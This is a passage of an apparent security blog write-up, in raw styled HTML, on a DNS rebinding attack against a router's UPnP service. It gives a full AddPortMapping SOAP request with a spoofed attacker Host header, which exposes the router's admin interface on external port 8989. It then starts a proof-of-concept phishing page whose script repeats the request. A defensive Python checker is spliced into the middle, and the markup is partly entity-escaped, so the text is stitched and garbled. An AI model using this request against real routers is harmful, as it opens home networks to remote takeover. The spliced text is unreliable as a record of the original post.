0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SCPDURL: /upnp/WAN/wanethernetlinkconfigSCPD.xml</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); 
border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"&gt;&lt;span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"&gt;&lt;span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"&gt; &lt;/span&gt; [&lt;span class="cm-operator" style="box-sizing: border-box;"&gt;+&lt;/span&gt;] Actions:&lt;/span&gt;&lt;/pre&gt;&lt;pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"&gt;&lt;span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"&gt;&lt;span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"&gt; &lt;/span&gt;&lt;span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"&gt; &lt;/span&gt; GetEthernetLinkStatus&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;p style="text-align: justify;"&gt;The “&lt;b&gt;AddPortMapping&lt;/b&gt;” action of the “&lt;b&gt;WANConnectionDevice&lt;/b&gt;” service is present, as expected, in the implemented IGD Profile.&lt;/p&gt;&lt;p style="text-align: justify;"&gt;Moreover, as shown in the HTTP request and response below, the router doesn't validate the Host header: it still returns a 200 response even when the value "&lt;i&gt;attacker.mindedsecurity.com&lt;/i&gt;" is placed in the Host header.&lt;/p&gt;&lt;/div&gt;&lt;p style="text-align: 
justify;">Request:</p><div><div class="CodeMirror-activeline" style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">POST</span> <span class="cm-string-2" style="box-sizing: border-box; color: #ff5500;">/control/WANIPConnection</span> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">HTTP/1.1</span></span></pre></div><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">Host:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> attacker.mindedsecurity</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); 
border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">SOAPAction:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> text/xml; charset="utf-8"</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; 
word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> 714</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><?xml version="1.0"?></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; 
white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <s:Body></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; 
white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewRemoteHost></NewRemoteHost></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewExternalPort>8989</NewExternalPort></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewProtocol>TCP</NewProtocol></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" 
style="box-sizing: border-box; padding-right: 0.1px;"> <NewInternalPort>80</NewInternalPort></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewInternalClient>192.168.1.1</NewInternalClient></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewEnabled>1</NewEnabled></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewPortMappingDescription>UPnP port mapping 
PoC</NewPortMappingDescription></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewLeaseDuration>0</NewLeaseDuration></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </u:AddPortMapping></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </s:Body></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); 
border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"></s:Envelope></span></pre></div><p style="text-align: left;">Response:</p><div><div class="CodeMirror-activeline" style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #50e650;">200</span> OK</span></pre></div><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; 
white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> text/xml; charset="utf-8"</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> close</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> 298</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); 
border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><?xml version="1.0"?></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body> <u:AddPortMappingResponse xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"></span></pre><pre 
class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"&gt;&lt;span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"&gt; &lt;/u:AddPortMappingResponse&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"&gt;&lt;span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"&gt;&lt;/s:Body&gt;&lt;/s:Envelope&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;span style="font-family: inherit;"&gt;The previous SOAP POST request, according to the &lt;b&gt;AddPortMapping&lt;/b&gt; action specification, exposes the administration web interface running on &lt;b&gt;192.168.1.1:80&lt;/b&gt; externally on port &lt;b&gt;8989&lt;/b&gt;, making it reachable from the Internet (if &lt;b&gt;NewRemoteHost&lt;/b&gt; is empty, its value is &lt;b&gt;0.0.0.0&lt;/b&gt; by default).&lt;/span&gt;&lt;/p&gt;&lt;div&gt;&lt;p style="text-align: justify;"&gt;The requirements are therefore satisfied, and a DNS Rebinding attack against the router can be used to inject this custom rule into its port forwarding table. &lt;/p&gt;&lt;p style="text-align: left;"&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;The following HTML page was used as the Proof of Concept phishing page. 
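Before the PoC page itself, here is the defender-side counterpart of the two conditions just described (a control endpoint that accepts any Host header, and an AddPortMapping that maps the gateway's own admin port). This is an added example and not code from the original post: `evaluate_request` is a hypothetical pre-check for a gateway's UPnP control handler, and the LAN range 192.168.1.0/24, the control port 5431 and the sample headers are constructed to match the setup in the post.

```python
import ipaddress
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WANIP_NS = "urn:schemas-upnp-org:service:WANIPConnection:1"

# Constructed deployment facts (assumptions for this example): the gateway's
# LAN address and subnet, and the port its UPnP control server listens on.
GATEWAY_LAN_IP = "192.168.1.1"
LAN_SUBNET = ipaddress.ip_network("192.168.1.0/24")
UPNP_CONTROL_PORT = 5431


def host_header_is_local(host_header):
    """DNS rebinding defence. A rebound browser keeps sending the attacker's
    hostname in Host, so a control endpoint that is only ever addressed by
    its LAN IP literal can reject every other value outright."""
    if not host_header:
        return False
    host = host_header.strip().lower()
    if ":" in host:  # "ip:port" form; only the control port is acceptable
        host, _, port = host.rpartition(":")
        if not port.isdigit() or int(port) != UPNP_CONTROL_PORT:
            return False
    return host == GATEWAY_LAN_IP


def parse_add_port_mapping(body):
    """Return the AddPortMapping arguments as a dict, or None when the body
    is not a well-formed AddPortMapping call."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    action = root.find(f"./{{{SOAP_NS}}}Body/{{{WANIP_NS}}}AddPortMapping")
    if action is None:
        return None
    # The argument elements carry no namespace, so child.tag is the bare name.
    args = {child.tag: (child.text or "").strip() for child in action}
    required = ("NewExternalPort", "NewProtocol", "NewInternalPort", "NewInternalClient")
    if any(name not in args for name in required):
        return None
    return args


def evaluate_request(headers, body):
    """Decide what the gateway should do with one control request.
    Returns (decision, reason); decision is 'deny' or 'allow'."""
    if not host_header_is_local(headers.get("Host")):
        return "deny", "Host header is not the gateway address (possible DNS rebinding)"
    args = parse_add_port_mapping(body)
    if args is None:
        return "deny", "malformed AddPortMapping body"
    try:
        client = ipaddress.ip_address(args["NewInternalClient"])
        for name in ("NewExternalPort", "NewInternalPort"):
            int(args[name])
    except ValueError:
        return "deny", "non-numeric port or invalid NewInternalClient"
    if client == ipaddress.ip_address(GATEWAY_LAN_IP):
        # A mapping whose internal client is the gateway itself can only ever
        # expose the gateway's own services (the admin UI on port 80 above);
        # with an empty NewRemoteHost it is reachable from any source.
        return "deny", "mapping targets the gateway itself"
    if client not in LAN_SUBNET:
        return "deny", "NewInternalClient is outside the LAN"
    return "allow", "mapping to LAN host accepted"


# Constructed sample: the request body from the post, as a browser that was
# rebound to the router would deliver it, plus the two Host values of interest.
SAMPLE_BODY = (
    '<?xml version="1.0"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
    's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
    '<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
    '<NewRemoteHost></NewRemoteHost><NewExternalPort>8989</NewExternalPort>'
    '<NewProtocol>TCP</NewProtocol><NewInternalPort>80</NewInternalPort>'
    '<NewInternalClient>192.168.1.1</NewInternalClient><NewEnabled>1</NewEnabled>'
    '<NewPortMappingDescription>UPnP port mapping PoC</NewPortMappingDescription>'
    '<NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>'
)
REBOUND_HEADERS = {"Host": "127-0-0-1.192-168-1-1.attacker.mindedsecurity.com:5431"}
LOCAL_HEADERS = {"Host": "192.168.1.1:5431"}

if __name__ == "__main__":
    print(evaluate_request(REBOUND_HEADERS, SAMPLE_BODY))
    print(evaluate_request(LOCAL_HEADERS, SAMPLE_BODY))
```

The first check alone defeats the rebinding PoC; the second stops the same rule from being injected by a LAN client that is already past the Host check.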
The page was run on localhost and the attacker domain in this case was &lt;b&gt;127-0-0-1.192-168-1-1.attacker.mindedsecurity.com&lt;/b&gt;.&lt;/p&gt;&lt;p style="text-align: justify;"&gt;The JavaScript code embedded inside the page repeatedly performs the &lt;b&gt;AddPortMapping&lt;/b&gt; SOAP POST request via XHR to &lt;b&gt;http://127-0-0-1.192-168-1-1.attacker.mindedsecurity.com:5431&lt;/b&gt;. &lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="CodeMirror-activeline" style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative;"&gt;&lt;pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"&gt;&lt;span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"&gt;&lt;span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"&gt;&lt;&lt;/span&gt;&lt;span class="cm-tag" style="box-sizing: border-box; color: #7df46a;"&gt;html&lt;/span&gt;&lt;span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"&gt;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"&gt;&lt;span role="presentation" style="box-sizing: 
border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">head</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">src</span>=<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"jquery.min.js"</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; 
